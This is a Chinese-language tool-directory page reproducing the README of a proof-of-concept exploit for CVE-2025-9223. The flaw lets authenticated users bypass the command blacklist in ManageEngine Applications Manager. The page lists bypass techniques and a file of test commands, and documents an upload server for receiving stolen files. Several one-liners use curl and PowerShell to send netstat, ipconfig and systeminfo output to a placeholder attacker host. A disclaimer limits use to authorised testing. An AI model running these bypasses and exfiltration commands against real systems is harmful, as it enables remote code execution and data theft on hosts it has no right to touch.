Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
工具/GitHubGitHub/networkkiller/cve-2025-9223
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露渗透测试命令与控制学习与教育
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

查看仓库
29个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 描述

本仓库包含一个概念验证(PoC),演示了 ManageEngine Applications Manager 中"Execute Program Action"功能存在的命令执行漏洞。

🔍 漏洞详情

Applications Manager 使用黑名单(BlackListCommands)来阻止危险命令,但验证存在严重缺陷:

  • 基于字符串的验证仅针对第一个令牌(token)
  • 缺少路径规范化或环境变量扩展
  • 缺少防护,无法阻止通过脚本进行间接执行

🚨 绕过方法

方法示例
绝对路径C:\Windows\System32\netstat.exe
环境变量%SystemRoot%\System32\netstat.exe
脚本包装器echo netstat > a.bat && a.bat

💥 影响

  • ✅ 在 Applications Manager 主机上实现经过身份验证的远程代码执行(RCE)
  • ✅ 绕过安全限制,完整执行系统命令
  • ✅ 使用系统实用程序(curl、powershell、certutil)进行数据外泄

📤 数据外泄 Payload 示例

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ 配置与使用

前提条件

  • Python 3.x
  • 可访问目标 Applications Manager 实例的网络连接
  • 具有"Execute Program Action"权限的经过身份验证的访问

文件上传服务器

脚本 upload_server.py 提供一个简单的 HTTP 服务器,用于接收被外泄的文件。

基本用法

root@kitploit:~
python3 upload_server.py

高级选项

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

参数

  • --host:绑定地址(默认值:0.0.0.0)
  • --port:HTTP 端口(默认值:8000)
  • --dir:输出目录(默认值:当前目录)

API 端点

方法端点

安全特性

✅ 防止路径遍历(path traversal)
✅ 使用带时间戳的唯一文件名
✅ 记录请求的 IP 和 User-Agent
✅ 内容类型验证

🎯 测试命令

创建一个包含绕过示例的 test_commands.txt 文件:

root@kitploit:~
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ 法律声明

重要提示: 本工具仅用于教育和授权测试目的。

❌ 请勿在您不拥有或未获明确测试许可的系统上使用
❌ 请勿将本工具用于任何非法活动
✅ 可以仅在受控环境中用于安全研究
✅ 可以在进行测试前获得适当授权

作者不对本工具的任何滥用负责。使用者需承担全部责任和风险。

📄 许可证

本项目仅用于研究和教育目的。保留所有权利。

👨‍💻 作者

Johan Aybar - 仅供教育目的


⚠️ 提醒: 此 PoC 仅应在授权的测试环境中使用。未经授权的使用可能属于违法行为,并受到严格禁止。

下载工具
描述
GET/列出最近上传的文件
POST/upload上传文件(multipart/form-data)
PUT/upload/[filename]直接上传文件